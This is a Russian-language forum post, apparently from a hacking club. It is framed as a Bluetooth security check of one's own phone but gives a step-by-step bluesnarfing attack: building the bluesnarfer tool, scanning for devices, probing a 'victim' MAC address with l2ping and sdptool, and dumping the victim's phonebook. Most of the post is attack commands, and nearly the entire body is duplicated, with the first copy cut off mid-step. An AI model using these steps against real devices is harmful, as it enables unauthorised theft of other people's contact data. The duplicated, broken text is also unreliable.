Download_Link
Участник клуба
Всем привет, сегодня мы проведем проверку на защищенность нашего телефона, с помощью блютуз.
Bluetooth — производственная спецификация беспроводных персональных сетей (Wireless personal area network). Bluetooth обеспечивает обмен информацией между персональными устройствами.
Установка и эксплуатация
Открываем терминал и вводим команду для обновления пакетов:
sudo apt-get update && apt-get upgrade
Далее клонируем репозиторий с помощью команды:
git clone https://github.com/boos/bluesnarfer
Переходим в директорию:
cd bluesnarfer
И компилируем утилиту:
make
После того, как инструмент полностью боеспособен, включаем режим мониторинга на нашем Bluetooth-адаптере:
hciconfig hci0 up
Далее сканируем доступные устройства с включенным Bluetooth:
hcitool scan
Запоминаем MAC-адрес нашего целевого устройства. Теперь нам нужно убедиться в том, что устройство не спит:
l2ping <MAC-адрес жертвы>
Просматриваем возможность подключения к жертве, используя rfcomm:
sdptool browse --tree --l2cap <MAC-адрес жертвы>
Если устройство жертвы подходит под наши требования, то мы можем спокойно произвести атаку. Например, с помощью данной команды мы можем просмотреть телефонную книгу нашей жертвы:
bluesnarfer -r <диапазон> -b <MAC-адрес жертвы>
Но это не все возможности данной утилиты. Для того, чтобы ознакомиться с полным функционалом инструмента, вводим команду для вывода справки:
Bluetooth — производственная спецификация беспроводных персональных сетей (Wireless personal area network). Bluetooth обеспечивает обмен информацией между персональными устройствами.
Установка и эксплуатация
Открываем терминал и вводим команду для обновления пакетов:
sudo apt-get update && apt-get upgrade
Далее клонируем репозиторий с помощью команды:
git clone https://github.com/boos/bluesnarfer
Переходим в директорию:
cd bluesnarfer
И компилируем утилиту:
make
После того, как инструмент полностью боеспособен, включаем режим мониторинга на нашем Bluetooth-адаптере:
hciconfig hci0 up
Далее сканируем доступные устройства с включенным Bluetooth:
hcitool scan
Запоминаем MAC-адрес нашего целевого устройства. Теперь нам нужно убедиться в том, что устройство не спит:
l2ping <MAC-адрес жертвы>
Просматриваем возможность подключения к жертве, используя rfcomm:
sdptool browse --tree --l2cap <MAC-адрес жертвы>
Если устройство жертвы подходит под наши требования, то мы можем спокойно произвести атаку. Например, с помощью данной команды мы можем просмотреть телефонную книгу нашей жертвы:
bluesnarfer -r <диапазон> -b <MAC-адрес жертвы>
Но это не все возможности данной утилиты. Для того, чтобы ознакомиться с полным функционалом инструмента, вводим команду для вывода справки:
Код:
bluesnarfer -h